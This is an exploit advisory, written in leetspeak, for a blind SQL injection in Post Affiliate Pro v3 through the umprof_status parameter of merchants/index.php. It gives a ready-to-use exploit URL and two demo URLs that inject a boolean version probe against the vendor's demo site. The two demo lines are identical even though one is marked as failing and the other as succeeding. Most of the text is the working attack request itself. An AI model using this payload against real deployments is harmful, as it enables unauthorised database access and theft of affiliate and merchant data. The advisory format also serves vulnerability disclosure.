[■] Post Affiliate Pro v.3 (index.php md) <= Blind $ql Injection >©< > AuToR: XaDoS > Contact M&: xados [at] hotmail [dot] it > B§g: Blind $ql inJection > SIte vuln: http://www.qualityunit.com/postaffiliatepro/ >©< [■] ExPL0iT: |: http://www.example.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=[sql] [you must be merchants] [■] D£M0: |: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [NO°°] |: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [y&$ ;-)] [■] Th4nKs:: \> Str0ke Joy Division Teo Babbeo Spud Loooo Z00ooo00oo0